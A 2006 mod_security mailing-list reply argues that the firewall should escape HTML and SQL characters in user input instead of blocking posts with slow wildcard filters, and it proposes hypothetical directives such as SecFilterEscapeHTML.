Re: [mod-security-users] mod_security causing Apache 1.3.33 to ha ng
Brought to you by:
victorhora,
zimmerletw
From: Tom A. <tan...@oa...> - 2006-01-13 15:00:34
|
Ivan Ristic wrote: >>I think it would be extremely useful to be able to modify request >>content in this way rather than just flagging it. > > > Perhaps, give me one real-life example where you would use it? > The present example of trying to prevent HTML injection in posts where user input is going to be displayed on a webpage, possibly by software that doesn't do proper sanitizing of its own. Doing little-constrained wildcard matching like "<.+?>" is a recipe for potentially huge performance hits, plus it wholesale rejects user input that should otherwise be acceptable in an escaped format. This would be true for SQL injection filters as well, and anywhere else that strings are blocked simply for containing dubious characters when they would be known OK if those characters could be escaped. Sanitizing functionality is like a bouncer at a club who checks IDs and stamps people's hands if they're over 21 so that they can order alcohol, and not reject from the club entirely those under 21. Likewise, you might not want to prevent people from having discussions _about_ HTML or SQL or other topics which might just contain strings that would trigger a filter block. Allow them to post their comments, but remove the attack potential by escaping those characters which would allow the strings to do damage under the wrong circumstances. Formats such as these might be ideal: SecFilterSelective ARG_BLOGPOST s/>/>/ SecFilterExternal ARG_BLOGPOST "html_escape.pl" SecFilterEscapeHTML ARG_BLOGPOST SecFilterEscapeSQL ARG_SEARCHSTRING Doing something like the last two should not be all that difficult, as simple generic escape functions can be written and simply applied to the argument listed. Just implementing SecFilterEscapeHTML ARG_BLOGPOST to replace SecFilterSelective ARG_BLOGPOST "<.+>" would both prevent lots of false positives (valid HTML discussions, etc) and measurably improve performance on moderately busy discussion forum or blog sites. This is real security, not just a perception... replacing key symbols with their HTML escape codes can annihilate HTML injection, XSS, and scripting attacks with little overhead. Tom |